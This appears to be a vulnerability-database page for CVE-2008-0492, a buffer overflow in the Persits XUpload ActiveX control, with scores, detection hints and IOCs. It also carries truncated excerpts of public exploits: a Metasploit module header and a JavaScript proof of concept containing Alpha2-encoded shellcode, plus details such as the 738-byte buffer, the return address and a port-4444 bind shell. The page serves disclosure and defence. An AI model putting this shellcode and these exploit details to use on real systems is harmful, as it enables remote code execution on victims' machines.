CVE-2008-0492
published 2008-01-30CVE-2008-0492: Stack-based buffer overflow in the Persits.XUpload.2 ActiveX control in XUpload.ocx 3.0.0.4 and earlier in Persits XUpload 3.0 allows remote attackers to…
PriorityP340medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
29.52%
98.0th percentile
Stack-based buffer overflow in the Persits.XUpload.2 ActiveX control in XUpload.ocx 3.0.0.4 and earlier in Persits XUpload 3.0 allows remote attackers to execute arbitrary code via a long argument to the AddFile method. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| persits | xupload | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a
bytes↗
%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a
- →Detect instantiation of the Persits.XUpload.2 ActiveX control (ProgID) in browser contexts, particularly calls to the AddFile() method with an oversized string argument (>738 bytes). ↗
- →Monitor for the presence of XUpload.ocx on disk, especially versions 3.0.0.3 and 3.0.0.4, which are the confirmed vulnerable versions targeted by public exploits. ↗
- →The Metasploit exploit uses a 738-byte alpha-numeric heap spray buffer passed to AddFile(); detect JavaScript heap spray patterns using unescape() with %u9090%u9090 NOP sleds in browser memory. ↗
- →The exploit targets a pop/pop/ret gadget at offset 0x10019d6e within XUpload.ocx; detect ROP/SEH chains referencing this address in memory or crash dumps. ↗
- →The shellcode uses Alpha2 encoding; detect the characteristic Alpha2 stub header bytes %u03eb%ueb59%ue805%ufff8%uffff in network traffic or memory. ↗
- →The bind-shell payload opens TCP port 4444; monitor for unexpected inbound connections on port 4444 following browser-based ActiveX exploitation. ↗
- ·The Metasploit module targets specifically XUpload.ocx version 3.0.0.3 on Windows XP SP3 with IE6 SP3; the RET address 0x10019d6e is version-specific and will not apply to other OS/browser/DLL combinations. ↗
- ·The NVD advisory notes that version 3.0.0.4 and earlier are vulnerable, but the public Metasploit exploit was only confirmed against 3.0.0.3; detection rules should cover both versions. ↗
- ·The exploit sets EXITFUNC=process (Metasploit) or EXITFUNC=seh (raw PoC); payload exit behavior differs between exploit variants, affecting post-exploitation forensic artifacts. ↗
- ·BadChars for the payload are limited to null bytes only (\x00), meaning the shellcode is largely unrestricted; Alpha2 encoding is used in the raw PoC to bypass any additional character filtering. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Persits XUpload - ActiveX AddFile Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2008-0492 Persits XUpload - ActiveX AddFile Buffer Overflow (Metasploit)
Persits XUpload - ActiveX AddFile Buffer Overflow (Metasploit)
---
##
# $Id: hp_loadrunner_addfile.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Persits XUpload ActiveX AddFile Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Persits Software Inc's
XUpload ActiveX control(version 3.0.0.3) thats included in HP LoadRunner 9.5.
By passing an overly long string to the AddFile method, an attacker may be
able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Autho
Exploit-DB
Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow
exploitdb·2008-01-25
CVE-2008-0492 Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow
Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow
---
Persits XUpload 3.0 AddFile() Buffer Overflow Exploit
function Check() {
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u595
Metasploit
Persits XUpload ActiveX AddFile Buffer Overflow
metasploit
Persits XUpload ActiveX AddFile Buffer Overflow
Persits XUpload ActiveX AddFile Buffer Overflow
This module exploits a stack buffer overflow in Persits Software Inc's XUpload ActiveX control(version 3.0.0.3) thats included in HP LoadRunner 9.5. By passing an overly long string to the AddFile method, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
http://secunia.com/advisories/28660http://www.securityfocus.com/bid/27456http://www.vupen.com/english/advisories/2008/0315https://exchange.xforce.ibmcloud.com/vulnerabilities/39967https://www.exploit-db.com/exploits/4987http://secunia.com/advisories/28660http://www.securityfocus.com/bid/27456http://www.vupen.com/english/advisories/2008/0315https://exchange.xforce.ibmcloud.com/vulnerabilities/39967https://www.exploit-db.com/exploits/4987
2008-01-30
Published